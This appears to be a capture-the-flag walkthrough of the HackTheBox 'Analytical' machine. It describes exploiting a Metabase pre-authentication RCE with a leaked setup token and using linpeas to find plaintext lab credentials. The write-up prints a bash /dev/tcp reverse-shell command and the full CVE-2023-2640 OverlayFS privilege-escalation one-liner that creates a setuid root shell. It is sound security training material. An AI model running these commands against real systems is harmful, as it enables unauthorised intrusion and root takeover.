First thing we are going to want to do on this box is to enumerate as always

Nmap returns 2 open ports. 22 and 80.

From here we are going to navigate to the site (it does not load until you add the site name analytical.htb to the etc/hosts file)

Navigating around this site there doesn’t appear to be too much to work with.

The “login” option brings us to a login page for an app called Metabase

This is looking for a username and password. I could not locate any default creds and brute forcing turned out to be a waste of time.

From here we are going to look for an exploit for metabase.

I came across this exploit —

There is also a secondary option you can run that is within the Metasploit framework. But we are going to use the github RCE poc

This exploit states that there should be a session token in /api/session/properties on the site.


After we retrieve this info, we are going to download the exploit from github to our system.

The syntax on running this exploit

python3 -u http://[targeturl] -t [setup-token] -c "[command]"

The – c command is where we want to locate a command to give us a reverse shell. So in a terminal I ran python3 -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c “bash -i >& /dev/tcp/ 0>&1”

Before running we want to make sure we have our netcat listener up and running to catch the reverse shell.

So we execute and get our reverse shell from the machine!

We can see that we are logged in as metabase.

From this point we did not have a user.txt file available. So we are going to transfer over to our target machine using a python server.

Once linpeas is on the machine we are going to run it using Bash

Sorting through the linpeas data, we are able to retrieve a username and password.

Username: metalytics

Password: An4lytics_ds20223#

This login does not work on the original login page of the site as it is requesting an email address. So the other location we can attempt to sign in is SSH as port 22 is open

From here we need to escalate our privileges

For this box, we enumerate the OS level of the machine.

Doing a google search and “privilege escalation”, I was able to locate the following CVEs

For this box, we are going to run CVE-2023-2640.

This states to run the following command — unshare -rm sh -c “mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;” && u/python3 -c ‘import os;os.setuid(0);os.system(“cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash”)’

Alternatively we can download the file and run it on the machine. For this box, I used the latter.

Running the simple command gave us Root access as well as root.txt!